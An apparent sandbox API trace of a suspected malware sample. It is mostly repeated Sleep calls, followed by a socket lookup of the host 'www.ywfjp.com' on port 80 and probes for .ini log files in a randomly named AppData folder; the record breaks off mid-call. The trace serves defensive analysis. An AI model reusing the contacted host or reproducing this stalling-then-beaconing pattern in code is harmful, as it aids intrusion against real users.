(dwMilliseconds=0x7d0) [0146.722] Sleep (dwMilliseconds=0x7d0) [0146.724] Sleep (dwMilliseconds=0x7d0) [0146.725] Sleep (dwMilliseconds=0x7d0) [0146.727] Sleep (dwMilliseconds=0x7d0) [0146.728] Sleep (dwMilliseconds=0x7d0) [0146.730] Sleep (dwMilliseconds=0x7d0) [0146.731] Sleep (dwMilliseconds=0x7d0) [0146.733] Sleep (dwMilliseconds=0x7d0) [0146.734] Sleep (dwMilliseconds=0x7d0) [0146.736] Sleep (dwMilliseconds=0x7d0) [0146.737] Sleep (dwMilliseconds=0x7d0) [0146.739] Sleep (dwMilliseconds=0x7d0) [0146.740] Sleep (dwMilliseconds=0x7d0) [0146.742] Sleep (dwMilliseconds=0x7d0) [0146.743] Sleep (dwMilliseconds=0x7d0) [0146.745] Sleep (dwMilliseconds=0x7d0) [0146.746] Sleep (dwMilliseconds=0x7d0) [0146.748] Sleep (dwMilliseconds=0x7d0) [0146.749] Sleep (dwMilliseconds=0x7d0) [0146.751] Sleep (dwMilliseconds=0x7d0) [0146.753] Sleep (dwMilliseconds=0x7d0) [0146.754] Sleep (dwMilliseconds=0x7d0) [0146.756] Sleep (dwMilliseconds=0x7d0) [0146.757] Sleep (dwMilliseconds=0x7d0) [0146.759] Sleep (dwMilliseconds=0x7d0) [0146.760] Sleep (dwMilliseconds=0x7d0) [0146.762] Sleep (dwMilliseconds=0x7d0) [0146.763] Sleep (dwMilliseconds=0x7d0) [0146.765] Sleep (dwMilliseconds=0x7d0) [0146.766] Sleep (dwMilliseconds=0x7d0) [0146.768] Sleep (dwMilliseconds=0x7d0) [0146.769] Sleep (dwMilliseconds=0x7d0) [0146.771] Sleep (dwMilliseconds=0x7d0) [0146.772] Sleep (dwMilliseconds=0x7d0) [0146.774] Sleep (dwMilliseconds=0x7d0) [0146.775] Sleep (dwMilliseconds=0x7d0) [0146.777] Sleep (dwMilliseconds=0x7d0) [0146.778] Sleep (dwMilliseconds=0x7d0) [0146.780] Sleep (dwMilliseconds=0x7d0) [0146.781] Sleep (dwMilliseconds=0x7d0) [0146.783] Sleep (dwMilliseconds=0x7d0) [0146.785] Sleep (dwMilliseconds=0x7d0) [0146.787] Sleep (dwMilliseconds=0x7d0) [0146.789] Sleep (dwMilliseconds=0x7d0) [0146.790] Sleep (dwMilliseconds=0x7d0) [0146.792] Sleep (dwMilliseconds=0x7d0) [0146.793] Sleep (dwMilliseconds=0x7d0) [0146.795] Sleep (dwMilliseconds=0x7d0) [0146.797] Sleep (dwMilliseconds=0x7d0) [0146.798] Sleep (dwMilliseconds=0x7d0) [0146.800] Sleep (dwMilliseconds=0x7d0) [0146.801] Sleep (dwMilliseconds=0x7d0) [0146.803] Sleep (dwMilliseconds=0x7d0) [0146.804] Sleep (dwMilliseconds=0x7d0) [0146.806] Sleep (dwMilliseconds=0x7d0) [0146.807] Sleep (dwMilliseconds=0x7d0) [0146.809] Sleep (dwMilliseconds=0x7d0) [0146.810] Sleep (dwMilliseconds=0x7d0) [0146.812] Sleep (dwMilliseconds=0x7d0) [0146.813] Sleep (dwMilliseconds=0x7d0) [0146.815] Sleep (dwMilliseconds=0x7d0) [0146.816] Sleep (dwMilliseconds=0x7d0) [0146.818] Sleep (dwMilliseconds=0x7d0) [0146.819] Sleep (dwMilliseconds=0x7d0) [0146.821] Sleep (dwMilliseconds=0x7d0) [0146.823] Sleep (dwMilliseconds=0x7d0) [0146.824] Sleep (dwMilliseconds=0x7d0) [0146.826] Sleep (dwMilliseconds=0x7d0) [0146.827] Sleep (dwMilliseconds=0x7d0) [0146.829] Sleep (dwMilliseconds=0x7d0) [0146.830] Sleep (dwMilliseconds=0x7d0) [0146.832] Sleep (dwMilliseconds=0x7d0) [0146.833] Sleep (dwMilliseconds=0x7d0) [0146.835] Sleep (dwMilliseconds=0x7d0) [0146.836] Sleep (dwMilliseconds=0x7d0) [0146.838] Sleep (dwMilliseconds=0x7d0) [0146.839] Sleep (dwMilliseconds=0x7d0) [0146.841] Sleep (dwMilliseconds=0x7d0) [0146.842] Sleep (dwMilliseconds=0x7d0) [0146.844] Sleep (dwMilliseconds=0x7d0) [0146.845] Sleep (dwMilliseconds=0x7d0) [0146.847] Sleep (dwMilliseconds=0x7d0) [0146.848] Sleep (dwMilliseconds=0x7d0) [0146.850] Sleep (dwMilliseconds=0x7d0) [0146.851] Sleep (dwMilliseconds=0x7d0) [0146.853] Sleep (dwMilliseconds=0x7d0) [0146.854] Sleep (dwMilliseconds=0x7d0) [0146.856] Sleep (dwMilliseconds=0x7d0) [0146.857] Sleep (dwMilliseconds=0x7d0) [0146.859] Sleep (dwMilliseconds=0x7d0) [0146.860] Sleep (dwMilliseconds=0x7d0) [0146.862] Sleep (dwMilliseconds=0x7d0) [0146.863] Sleep (dwMilliseconds=0x7d0) [0146.865] Sleep (dwMilliseconds=0x7d0) [0146.866] Sleep (dwMilliseconds=0x7d0) [0146.868] Sleep (dwMilliseconds=0x7d0) [0146.869] Sleep (dwMilliseconds=0x7d0) [0146.871] Sleep (dwMilliseconds=0x7d0) [0146.872] Sleep (dwMilliseconds=0x7d0) [0146.874] Sleep (dwMilliseconds=0x7d0) [0146.875] Sleep (dwMilliseconds=0x7d0) [0146.877] Sleep (dwMilliseconds=0x7d0) [0146.878] Sleep (dwMilliseconds=0x7d0) [0146.880] Sleep (dwMilliseconds=0x7d0) [0146.881] Sleep (dwMilliseconds=0x7d0) [0146.883] Sleep (dwMilliseconds=0x7d0) [0146.885] Sleep (dwMilliseconds=0x7d0) [0146.887] Sleep (dwMilliseconds=0x7d0) [0146.888] Sleep (dwMilliseconds=0x7d0) [0146.890] Sleep (dwMilliseconds=0x7d0) [0146.891] Sleep (dwMilliseconds=0x7d0) [0146.893] Sleep (dwMilliseconds=0x7d0) [0146.894] Sleep (dwMilliseconds=0x7d0) [0146.896] Sleep (dwMilliseconds=0x7d0) [0146.897] Sleep (dwMilliseconds=0x7d0) [0146.899] Sleep (dwMilliseconds=0x7d0) [0146.900] Sleep (dwMilliseconds=0x7d0) [0146.902] Sleep (dwMilliseconds=0x7d0) [0146.903] Sleep (dwMilliseconds=0x7d0) [0146.905] Sleep (dwMilliseconds=0x7d0) [0146.906] Sleep (dwMilliseconds=0x7d0) [0146.908] Sleep (dwMilliseconds=0x7d0) [0146.909] Sleep (dwMilliseconds=0x7d0) [0146.911] Sleep (dwMilliseconds=0x7d0) [0146.912] Sleep (dwMilliseconds=0x7d0) [0146.914] Sleep (dwMilliseconds=0x7d0) [0146.915] Sleep (dwMilliseconds=0x7d0) [0146.917] Sleep (dwMilliseconds=0x7d0) [0146.918] Sleep (dwMilliseconds=0x7d0) [0146.920] Sleep (dwMilliseconds=0x7d0) [0146.921] Sleep (dwMilliseconds=0x7d0) [0146.923] Sleep (dwMilliseconds=0x7d0) [0146.924] Sleep (dwMilliseconds=0x7d0) [0146.926] Sleep (dwMilliseconds=0x7d0) [0146.927] Sleep (dwMilliseconds=0x7d0) [0146.929] Sleep (dwMilliseconds=0x7d0) [0146.930] Sleep (dwMilliseconds=0x7d0) [0146.932] Sleep (dwMilliseconds=0x7d0) [0146.933] Sleep (dwMilliseconds=0x7d0) [0146.935] Sleep (dwMilliseconds=0x7d0) [0146.936] Sleep (dwMilliseconds=0x7d0) [0146.938] Sleep (dwMilliseconds=0x7d0) [0146.939] Sleep (dwMilliseconds=0x7d0) [0146.941] Sleep (dwMilliseconds=0x7d0) [0146.942] Sleep (dwMilliseconds=0x7d0) [0146.944] Sleep (dwMilliseconds=0x7d0) [0146.945] Sleep (dwMilliseconds=0x7d0) [0146.947] Sleep (dwMilliseconds=0x7d0) [0146.948] Sleep (dwMilliseconds=0x7d0) [0146.950] Sleep (dwMilliseconds=0x7d0) [0146.951] Sleep (dwMilliseconds=0x7d0) [0146.953] Sleep (dwMilliseconds=0x7d0) [0146.954] Sleep (dwMilliseconds=0x7d0) [0146.956] Sleep (dwMilliseconds=0x7d0) [0146.957] Sleep (dwMilliseconds=0x7d0) [0146.959] Sleep (dwMilliseconds=0x7d0) [0146.960] Sleep (dwMilliseconds=0x7d0) [0146.962] Sleep (dwMilliseconds=0x7d0) [0146.963] Sleep (dwMilliseconds=0x7d0) [0146.968] Sleep (dwMilliseconds=0x7d0) [0146.970] Sleep (dwMilliseconds=0x7d0) [0146.971] Sleep (dwMilliseconds=0x7d0) [0146.973] Sleep (dwMilliseconds=0x7d0) [0146.974] Sleep (dwMilliseconds=0x7d0) [0146.976] Sleep (dwMilliseconds=0x7d0) [0146.977] Sleep (dwMilliseconds=0x7d0) [0146.979] Sleep (dwMilliseconds=0x7d0) [0146.980] Sleep (dwMilliseconds=0x7d0) [0146.982] Sleep (dwMilliseconds=0x7d0) [0146.983] Sleep (dwMilliseconds=0x7d0) [0146.986] Sleep (dwMilliseconds=0x7d0) [0146.987] Sleep (dwMilliseconds=0x7d0) [0146.989] Sleep (dwMilliseconds=0x7d0) [0146.990] Sleep (dwMilliseconds=0x7d0) [0146.992] Sleep (dwMilliseconds=0x7d0) [0146.993] Sleep (dwMilliseconds=0x7d0) [0146.995] Sleep (dwMilliseconds=0x7d0) [0146.996] Sleep (dwMilliseconds=0x7d0) [0146.998] Sleep (dwMilliseconds=0x7d0) [0146.999] Sleep (dwMilliseconds=0x7d0) [0147.001] Sleep (dwMilliseconds=0x7d0) [0147.002] Sleep (dwMilliseconds=0x7d0) [0147.004] Sleep (dwMilliseconds=0x7d0) [0147.005] Sleep (dwMilliseconds=0x7d0) [0147.007] Sleep (dwMilliseconds=0x7d0) [0147.008] Sleep (dwMilliseconds=0x7d0) [0147.010] Sleep (dwMilliseconds=0x7d0) [0147.011] Sleep (dwMilliseconds=0x7d0) [0147.013] Sleep (dwMilliseconds=0x7d0) [0147.014] Sleep (dwMilliseconds=0x7d0) [0147.016] Sleep (dwMilliseconds=0x7d0) [0147.017] Sleep (dwMilliseconds=0x7d0) [0147.019] Sleep (dwMilliseconds=0x7d0) [0147.020] Sleep (dwMilliseconds=0x7d0) [0147.022] Sleep (dwMilliseconds=0x7d0) [0147.023] Sleep (dwMilliseconds=0x7d0) [0147.025] Sleep (dwMilliseconds=0x7d0) [0147.028] Sleep (dwMilliseconds=0x7d0) [0147.029] Sleep (dwMilliseconds=0x7d0) [0147.031] Sleep (dwMilliseconds=0x7d0) [0147.032] Sleep (dwMilliseconds=0x7d0) [0147.034] Sleep (dwMilliseconds=0x7d0) [0147.035] Sleep (dwMilliseconds=0x7d0) [0147.037] Sleep (dwMilliseconds=0x7d0) [0147.038] Sleep (dwMilliseconds=0x7d0) [0147.040] Sleep (dwMilliseconds=0x7d0) [0147.041] Sleep (dwMilliseconds=0x7d0) [0147.043] Sleep (dwMilliseconds=0x7d0) [0147.044] Sleep (dwMilliseconds=0x7d0) [0147.046] Sleep (dwMilliseconds=0x7d0) [0147.047] Sleep (dwMilliseconds=0x7d0) [0147.049] Sleep (dwMilliseconds=0x7d0) [0147.050] Sleep (dwMilliseconds=0x7d0) [0147.052] Sleep (dwMilliseconds=0x7d0) [0147.053] Sleep (dwMilliseconds=0x7d0) [0147.055] Sleep (dwMilliseconds=0x7d0) [0147.056] Sleep (dwMilliseconds=0x7d0) [0147.058] Sleep (dwMilliseconds=0x7d0) [0147.059] Sleep (dwMilliseconds=0x7d0) [0147.061] Sleep (dwMilliseconds=0x7d0) [0147.062] Sleep (dwMilliseconds=0x7d0) [0147.064] Sleep (dwMilliseconds=0x7d0) [0147.065] Sleep (dwMilliseconds=0x7d0) [0147.067] Sleep (dwMilliseconds=0x7d0) [0147.068] Sleep (dwMilliseconds=0x7d0) [0147.070] Sleep (dwMilliseconds=0x7d0) [0147.071] Sleep (dwMilliseconds=0x7d0) [0147.073] Sleep (dwMilliseconds=0x7d0) [0147.074] Sleep (dwMilliseconds=0x7d0) [0147.076] Sleep (dwMilliseconds=0x7d0) [0147.077] Sleep (dwMilliseconds=0x7d0) [0147.079] Sleep (dwMilliseconds=0x7d0) [0147.080] Sleep (dwMilliseconds=0x7d0) [0147.082] Sleep (dwMilliseconds=0x7d0) [0147.209] Sleep (dwMilliseconds=0x7d0) [0147.213] Sleep (dwMilliseconds=0x7d0) [0147.214] Sleep (dwMilliseconds=0x7d0) [0147.216] Sleep (dwMilliseconds=0x7d0) [0147.217] Sleep (dwMilliseconds=0x7d0) [0147.219] Sleep (dwMilliseconds=0x7d0) [0147.221] Sleep (dwMilliseconds=0x7d0) [0147.222] Sleep (dwMilliseconds=0x7d0) [0147.224] Sleep (dwMilliseconds=0x7d0) [0147.225] Sleep (dwMilliseconds=0x7d0) [0147.227] Sleep (dwMilliseconds=0x7d0) [0147.228] Sleep (dwMilliseconds=0x7d0) [0147.230] Sleep (dwMilliseconds=0x7d0) [0147.231] Sleep (dwMilliseconds=0x7d0) [0147.233] Sleep (dwMilliseconds=0x7d0) [0147.234] Sleep (dwMilliseconds=0x7d0) [0147.236] Sleep (dwMilliseconds=0x7d0) [0147.237] Sleep (dwMilliseconds=0x7d0) [0147.239] Sleep (dwMilliseconds=0x7d0) [0147.309] Sleep (dwMilliseconds=0x7d0) [0147.311] Sleep (dwMilliseconds=0x7d0) [0147.312] Sleep (dwMilliseconds=0x7d0) [0147.314] Sleep (dwMilliseconds=0x7d0) [0147.315] Sleep (dwMilliseconds=0x7d0) [0147.317] Sleep (dwMilliseconds=0x7d0) [0147.318] Sleep (dwMilliseconds=0x7d0) [0147.320] Sleep (dwMilliseconds=0x7d0) [0147.321] Sleep (dwMilliseconds=0x7d0) [0147.323] Sleep (dwMilliseconds=0x7d0) [0147.324] Sleep (dwMilliseconds=0x7d0) [0147.326] Sleep (dwMilliseconds=0x7d0) [0147.327] Sleep (dwMilliseconds=0x7d0) [0147.329] Sleep (dwMilliseconds=0x7d0) [0147.330] Sleep (dwMilliseconds=0x7d0) [0147.332] Sleep (dwMilliseconds=0x7d0) [0147.333] Sleep (dwMilliseconds=0x7d0) [0147.335] Sleep (dwMilliseconds=0x7d0) [0147.336] Sleep (dwMilliseconds=0x7d0) [0147.338] Sleep (dwMilliseconds=0x7d0) [0147.339] Sleep (dwMilliseconds=0x7d0) [0147.341] Sleep (dwMilliseconds=0x7d0) [0147.342] Sleep (dwMilliseconds=0x7d0) [0147.344] Sleep (dwMilliseconds=0x7d0) [0147.345] Sleep (dwMilliseconds=0x7d0) [0147.347] Sleep (dwMilliseconds=0x7d0) [0147.348] Sleep (dwMilliseconds=0x7d0) [0147.350] Sleep (dwMilliseconds=0x7d0) [0147.351] Sleep (dwMilliseconds=0x7d0) [0147.354] Sleep (dwMilliseconds=0x7d0) [0147.356] Sleep (dwMilliseconds=0x7d0) [0147.357] Sleep (dwMilliseconds=0x7d0) [0147.359] Sleep (dwMilliseconds=0x7d0) [0147.360] Sleep (dwMilliseconds=0x7d0) [0147.362] Sleep (dwMilliseconds=0x7d0) [0147.363] Sleep (dwMilliseconds=0x7d0) [0147.365] Sleep (dwMilliseconds=0x7d0) [0147.366] Sleep (dwMilliseconds=0x7d0) [0147.368] Sleep (dwMilliseconds=0x7d0) [0147.369] Sleep (dwMilliseconds=0x7d0) [0147.371] Sleep (dwMilliseconds=0x7d0) [0147.372] Sleep (dwMilliseconds=0x7d0) [0147.374] Sleep (dwMilliseconds=0x7d0) [0147.375] Sleep (dwMilliseconds=0x7d0) [0147.377] Sleep (dwMilliseconds=0x7d0) [0147.378] Sleep (dwMilliseconds=0x7d0) [0147.380] Sleep (dwMilliseconds=0x7d0) [0147.381] Sleep (dwMilliseconds=0x7d0) [0147.383] Sleep (dwMilliseconds=0x7d0) [0147.384] Sleep (dwMilliseconds=0x7d0) [0147.386] Sleep (dwMilliseconds=0x7d0) [0147.387] Sleep (dwMilliseconds=0x7d0) [0147.389] Sleep (dwMilliseconds=0x7d0) [0147.390] Sleep (dwMilliseconds=0x7d0) [0147.393] Sleep (dwMilliseconds=0x7d0) [0147.394] Sleep (dwMilliseconds=0x7d0) [0147.396] Sleep (dwMilliseconds=0x7d0) [0147.397] Sleep (dwMilliseconds=0x7d0) [0147.399] Sleep (dwMilliseconds=0x7d0) [0147.400] Sleep (dwMilliseconds=0x7d0) [0147.402] Sleep (dwMilliseconds=0x7d0) [0147.403] Sleep (dwMilliseconds=0x7d0) [0147.405] Sleep (dwMilliseconds=0x7d0) [0147.406] Sleep (dwMilliseconds=0x7d0) [0147.408] Sleep (dwMilliseconds=0x7d0) [0147.409] Sleep (dwMilliseconds=0x7d0) [0147.411] Sleep (dwMilliseconds=0x7d0) [0147.412] Sleep (dwMilliseconds=0x7d0) [0147.414] Sleep (dwMilliseconds=0x7d0) [0147.415] Sleep (dwMilliseconds=0x7d0) [0147.417] Sleep (dwMilliseconds=0x7d0) [0147.418] Sleep (dwMilliseconds=0x7d0) [0147.420] Sleep (dwMilliseconds=0x7d0) [0147.421] Sleep (dwMilliseconds=0x7d0) [0147.423] Sleep (dwMilliseconds=0x7d0) [0147.424] Sleep (dwMilliseconds=0x7d0) [0147.426] Sleep (dwMilliseconds=0x7d0) [0147.427] Sleep (dwMilliseconds=0x7d0) [0147.429] Sleep (dwMilliseconds=0x7d0) [0147.430] Sleep (dwMilliseconds=0x7d0) [0147.439] Sleep (dwMilliseconds=0x7d0) [0147.440] Sleep (dwMilliseconds=0x7d0) [0147.442] Sleep (dwMilliseconds=0x7d0) [0147.443] Sleep (dwMilliseconds=0x7d0) [0147.445] Sleep (dwMilliseconds=0x7d0) [0147.447] Sleep (dwMilliseconds=0x7d0) [0147.448] Sleep (dwMilliseconds=0x7d0) [0147.450] Sleep (dwMilliseconds=0x7d0) [0147.451] Sleep (dwMilliseconds=0x7d0) [0147.453] Sleep (dwMilliseconds=0x7d0) [0147.455] Sleep (dwMilliseconds=0x7d0) [0147.456] Sleep (dwMilliseconds=0x7d0) [0147.483] Sleep (dwMilliseconds=0x7d0) [0147.485] Sleep (dwMilliseconds=0x7d0) [0147.486] Sleep (dwMilliseconds=0x7d0) [0147.488] Sleep (dwMilliseconds=0x7d0) [0147.489] Sleep (dwMilliseconds=0x7d0) [0147.491] Sleep (dwMilliseconds=0x7d0) [0147.493] Sleep (dwMilliseconds=0x7d0) [0147.494] Sleep (dwMilliseconds=0x7d0) [0147.496] Sleep (dwMilliseconds=0x7d0) [0147.497] Sleep (dwMilliseconds=0x7d0) [0147.499] Sleep (dwMilliseconds=0x7d0) [0147.500] Sleep (dwMilliseconds=0x7d0) [0147.502] Sleep (dwMilliseconds=0x7d0) [0147.503] Sleep (dwMilliseconds=0x7d0) [0147.505] Sleep (dwMilliseconds=0x7d0) [0147.506] Sleep (dwMilliseconds=0x7d0) [0147.508] Sleep (dwMilliseconds=0x7d0) [0147.509] Sleep (dwMilliseconds=0x7d0) [0147.511] Sleep (dwMilliseconds=0x7d0) [0147.512] Sleep (dwMilliseconds=0x7d0) [0147.514] Sleep (dwMilliseconds=0x7d0) [0147.515] Sleep (dwMilliseconds=0x7d0) [0147.517] Sleep (dwMilliseconds=0x7d0) [0147.623] Sleep (dwMilliseconds=0x7d0) [0147.639] Sleep (dwMilliseconds=0x7d0) [0147.641] Sleep (dwMilliseconds=0x7d0) [0147.643] Sleep (dwMilliseconds=0x7d0) [0147.644] Sleep (dwMilliseconds=0x7d0) [0147.646] Sleep (dwMilliseconds=0x7d0) [0147.647] Sleep (dwMilliseconds=0x7d0) [0147.649] Sleep (dwMilliseconds=0x7d0) [0147.650] Sleep (dwMilliseconds=0x7d0) [0147.652] Sleep (dwMilliseconds=0x7d0) [0147.653] Sleep (dwMilliseconds=0x7d0) [0147.655] Sleep (dwMilliseconds=0x7d0) [0147.656] Sleep (dwMilliseconds=0x7d0) [0147.658] Sleep (dwMilliseconds=0x7d0) [0147.659] Sleep (dwMilliseconds=0x7d0) [0147.661] Sleep (dwMilliseconds=0x7d0) [0147.662] Sleep (dwMilliseconds=0x7d0) [0147.664] Sleep (dwMilliseconds=0x7d0) [0147.665] Sleep (dwMilliseconds=0x7d0) [0147.667] Sleep (dwMilliseconds=0x7d0) [0147.685] Sleep (dwMilliseconds=0x7d0) [0147.686] Sleep (dwMilliseconds=0x7d0) [0147.688] Sleep (dwMilliseconds=0x7d0) [0147.689] Sleep (dwMilliseconds=0x7d0) [0147.691] Sleep (dwMilliseconds=0x7d0) [0147.694] Sleep (dwMilliseconds=0x7d0) [0147.695] Sleep (dwMilliseconds=0x7d0) [0147.697] Sleep (dwMilliseconds=0x7d0) [0147.698] Sleep (dwMilliseconds=0x7d0) [0147.700] Sleep (dwMilliseconds=0x7d0) [0147.701] Sleep (dwMilliseconds=0x7d0) [0147.703] Sleep (dwMilliseconds=0x7d0) [0147.704] Sleep (dwMilliseconds=0x7d0) [0147.707] Sleep (dwMilliseconds=0x7d0) [0147.709] Sleep (dwMilliseconds=0x7d0) [0147.711] Sleep (dwMilliseconds=0x7d0) [0147.712] Sleep (dwMilliseconds=0x7d0) [0147.714] Sleep (dwMilliseconds=0x7d0) [0147.715] Sleep (dwMilliseconds=0x7d0) [0147.717] Sleep (dwMilliseconds=0x7d0) [0147.718] Sleep (dwMilliseconds=0x7d0) [0147.720] Sleep (dwMilliseconds=0x7d0) [0147.721] Sleep (dwMilliseconds=0x7d0) [0147.723] Sleep (dwMilliseconds=0x7d0) [0147.724] Sleep (dwMilliseconds=0x7d0) [0147.726] Sleep (dwMilliseconds=0x7d0) [0147.727] Sleep (dwMilliseconds=0x7d0) [0147.729] Sleep (dwMilliseconds=0x7d0) [0147.730] Sleep (dwMilliseconds=0x7d0) [0147.732] Sleep (dwMilliseconds=0x7d0) [0147.733] Sleep (dwMilliseconds=0x7d0) [0147.735] Sleep (dwMilliseconds=0x7d0) [0147.736] Sleep (dwMilliseconds=0x7d0) [0147.739] Sleep (dwMilliseconds=0x7d0) [0147.740] Sleep (dwMilliseconds=0x7d0) [0147.742] Sleep (dwMilliseconds=0x7d0) [0147.743] Sleep (dwMilliseconds=0x7d0) [0147.745] Sleep (dwMilliseconds=0x7d0) [0147.746] Sleep (dwMilliseconds=0x7d0) [0147.748] Sleep (dwMilliseconds=0x7d0) [0147.749] Sleep (dwMilliseconds=0x7d0) [0147.751] Sleep (dwMilliseconds=0x7d0) [0147.752] Sleep (dwMilliseconds=0x7d0) [0147.754] Sleep (dwMilliseconds=0x7d0) [0147.755] Sleep (dwMilliseconds=0x7d0) [0147.757] Sleep (dwMilliseconds=0x7d0) [0147.759] Sleep (dwMilliseconds=0x7d0) [0147.761] Sleep (dwMilliseconds=0x7d0) [0147.762] Sleep (dwMilliseconds=0x7d0) [0147.764] Sleep (dwMilliseconds=0x7d0) [0147.765] Sleep (dwMilliseconds=0x7d0) [0147.767] Sleep (dwMilliseconds=0x7d0) [0147.768] Sleep (dwMilliseconds=0x7d0) [0147.770] Sleep (dwMilliseconds=0x7d0) [0147.771] Sleep (dwMilliseconds=0x7d0) [0147.773] Sleep (dwMilliseconds=0x7d0) [0147.774] Sleep (dwMilliseconds=0x7d0) [0147.776] Sleep (dwMilliseconds=0x7d0) [0147.777] Sleep (dwMilliseconds=0x7d0) [0147.779] Sleep (dwMilliseconds=0x7d0) [0147.780] Sleep (dwMilliseconds=0x7d0) [0147.782] Sleep (dwMilliseconds=0x7d0) [0147.784] Sleep (dwMilliseconds=0x7d0) [0147.785] Sleep (dwMilliseconds=0x7d0) [0147.787] Sleep (dwMilliseconds=0x7d0) [0147.788] Sleep (dwMilliseconds=0x7d0) [0147.790] Sleep (dwMilliseconds=0x7d0) [0147.791] Sleep (dwMilliseconds=0x7d0) [0147.794] Sleep (dwMilliseconds=0x7d0) [0147.795] Sleep (dwMilliseconds=0x7d0) [0147.797] Sleep (dwMilliseconds=0x7d0) [0147.799] Sleep (dwMilliseconds=0x7d0) [0147.800] Sleep (dwMilliseconds=0x7d0) [0147.802] Sleep (dwMilliseconds=0x7d0) [0147.803] socket (af=2, type=1, protocol=6) returned 0x2480 [0147.804] getaddrinfo (in: pNodeName="www.ywfjp.com", pServiceName="80", pHints=0x8790238*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790268 | out: ppResult=0x8790268*=0x0) returned 11001 [0160.708] Sleep (dwMilliseconds=0x7d0) [0160.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.726] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.727] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0160.727] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894cf40) returned 1 [0160.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.727] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.727] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.727] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ca30) returned 1 [0160.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.727] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.727] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.727] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894cf40) returned 1 [0160.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.727] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: 